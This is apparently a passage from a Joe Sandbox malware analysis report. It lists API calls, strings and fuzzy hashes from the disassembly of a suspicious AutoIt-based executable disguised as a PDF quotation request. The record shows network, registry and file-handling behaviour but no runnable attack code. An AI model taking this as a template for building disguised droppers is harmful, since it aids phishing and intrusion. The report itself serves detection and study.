                                                                    • String ID: '$\$h
                                                                    • API String ID: 2205784470-1303700344
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                    Strings
                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                    Similarity
                                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 2441338619-1568723262
                                                                    APIs
                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                    • String ID: @COM_EVENTOBJ
                                                                    • API String ID: 327565842-2228938565
                                                                    • Opcode ID: 02a7cf746e7af3bb9dbcbb49c0257757b7d6ee221c5c5c84c5af0c819b853888
                                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                    • Opcode Fuzzy Hash: 02a7cf746e7af3bb9dbcbb49c0257757b7d6ee221c5c5c84c5af0c819b853888
                                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                    APIs
                                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                    • String ID: H
                                                                    • API String ID: 3613100350-2852464175
                                                                    • Opcode ID: 6baba9221bf3346e1816a52ef7af72f7827635b041b7ba787fd1518cb8b20685
                                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                    • Opcode Fuzzy Hash: 6baba9221bf3346e1816a52ef7af72f7827635b041b7ba787fd1518cb8b20685
                                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 4174999648-3243417748
                                                                    • Opcode ID: 6e9120409e3492adb89672eb229e0eb1156b45b3b75482f07ba79714e92e1fba
                                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                    • Opcode Fuzzy Hash: 6e9120409e3492adb89672eb229e0eb1156b45b3b75482f07ba79714e92e1fba
                                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 1291720006-3916222277
                                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                    APIs
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                    • String ID: crts
                                                                    • API String ID: 586820018-3724388283
                                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                    APIs
                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,0040F545,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,004A90E8,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,?,0040F545), ref: 0041013C
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 2326526234-1173974218
                                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                    APIs
                                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                    • _wcslen.LIBCMT ref: 004335F2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                    • String ID: \
                                                                    • API String ID: 321622961-2967466578
                                                                    • Opcode ID: 81cb13daa9af2fd8c1153ed84f988300e4acaa6a87e34bc6b07dd4fec930aca5
                                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                    • Opcode Fuzzy Hash: 81cb13daa9af2fd8c1153ed84f988300e4acaa6a87e34bc6b07dd4fec930aca5
                                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 4c1289b990d2add33d16b64a277af7c2db64037aef378f833fcd5b38fa60a411
                                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                    • Opcode Fuzzy Hash: 4c1289b990d2add33d16b64a277af7c2db64037aef378f833fcd5b38fa60a411
                                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                    • __lock.LIBCMT ref: 00417981
                                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                    • __lock.LIBCMT ref: 004179A2
                                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                    • String ID: KERNEL32.DLL$pI
                                                                    • API String ID: 637971194-197072765
                                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_malloc
                                                                    • String ID:
                                                                    • API String ID: 1938898002-0
                                                                    • Opcode ID: 18952b3d412471a5ed9da7bcf155e9e6259566645eb9f54bbaf82b361ded0344
                                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                    • Opcode Fuzzy Hash: 18952b3d412471a5ed9da7bcf155e9e6259566645eb9f54bbaf82b361ded0344
                                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                    • _memmove.LIBCMT ref: 0044B555
                                                                    • _memmove.LIBCMT ref: 0044B578
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                    • String ID:
                                                                    • API String ID: 2737351978-0
                                                                    • Opcode ID: 4e086f6b3af6bf849e204d87749429cbd2f556d0c5b9f3e943595c9155d9fc7d
                                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                    • Opcode Fuzzy Hash: 4e086f6b3af6bf849e204d87749429cbd2f556d0c5b9f3e943595c9155d9fc7d
                                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                                    • __getptd.LIBCMT ref: 00415253
                                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                    • _free.LIBCMT ref: 0041529E
                                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                    • String ID:
                                                                    • API String ID: 3638380555-0
                                                                    • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                    • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 3207048006-625585964
                                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                    • _memmove.LIBCMT ref: 004656CA
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                    • String ID:
                                                                    • API String ID: 2945290962-0
                                                                    • Opcode ID: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                    • Opcode Fuzzy Hash: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                    • String ID:
                                                                    • API String ID: 1457242333-0
                                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                    • String ID:
                                                                    • API String ID: 15295421-0
                                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
